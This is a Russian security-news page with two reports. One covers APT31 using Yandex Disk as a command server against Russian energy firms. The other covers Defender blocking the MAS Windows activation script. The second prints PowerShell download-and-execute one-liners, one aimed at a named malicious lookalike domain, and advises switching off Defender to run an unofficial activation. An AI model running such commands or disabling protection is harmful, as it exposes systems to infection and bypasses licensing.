Яндекс Диск используется в целевых кибератаках на российский ТЭК

Яндекс Диск используется в целевых кибератаках на российский ТЭК

Яндекс Диск используется в целевых кибератаках на российский ТЭК

Хакеры начали использовать Яндекс Диск в атаках на российские медиаресурсы и топливно-энергетические компании. Речь о группировке АРТ31, которую считают китайской. Эксперты рекомендуют “не витать в облаках” без антивируса.

О схеме с использованием Яндекса Диска для кибератак рассказали в Positive Technologies. До этого преступники задействовали популярные зарубежные сервисы OneDrive и Dropbox. Хранилище из России злоумышленники использовали впервые, утверждают специалисты.

Загрузить в подобные файловые хранилища вредоносный код просто — компании не имеют права идентифицировать личные файлы пользователей. 

Обнаружить саму вредоносную активность сложно, она выглядит как обычный трафик.

Заражение устройства происходит так: жертва по электронной почте получает документ с названием, например, «список.docx». Как только его открывают, файл начинает загрузку макроса (специального алгоритма, записанного злоумышленником заранее).

 

Алгоритм приводится в действие и загружает три файла: исполняемый (набор инструментов, заставляющий компьютер выполнить определенную задачу), вредоносную библиотеку и сам документ, который должен отвлечь внимание пользователя.

Исполняемый файл — это компонент “Яндекс Браузера”, уязвимого к кибератаке, сказали в Positive Technologies. Там уточнили: “Яндекс Браузер” в полном составе не используется, то есть у пользователя на компьютере может быть открыт любой другой, задействован один конкретный файл. Далее вирус идет на “Яндекс Диск” и забирает оттуда необходимые ему команды, рассказали специалисты.

Исследование показало, что атакующие используют “Яндекс Диск” в качестве контрольного сервера. Хакеры из APT31 задействовала популярный облачный сервис в том числе для того, чтобы трафик был похож на легитимный, объяснил эксперт Positive Technologies Даниил Колосков.

По его словам, вредоносную программу, которую применяют в качестве контрольного сервера “Яндекс Диск”, крайне сложно идентифицировать.

Чтобы защитить себя, эксперты по информационной безопасности советуют с недоверием относиться к любым вложениям в электронных письмах, пришедших с незнакомых адресов.

Переход на российские облачные хранилища для атаки на российских же пользователей выглядит весьма логичным и прогнозируемым, комментирует новость для Anti-Malware руководитель группы защиты инфраструктурных ИТ компании “Газинформсервис” Сергей Полунин.

“Подобные зарубежные сервисы стали ограничивать доступ для россиян, поэтому злоумышленникам тоже пришлось подстраиваться” — добавляет эксперт. — Плюс, немало пользователей продолжают доверять брендам, да и в описание того же Яндекс.Диска указано, что все загружаемые файлы проверяются антивирусом”.

Основной экспертный совет — относиться к файлам из публичных облачных хранилищ так же, как к тем, что скачиваются с неизвестного ресурсам в интернете.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru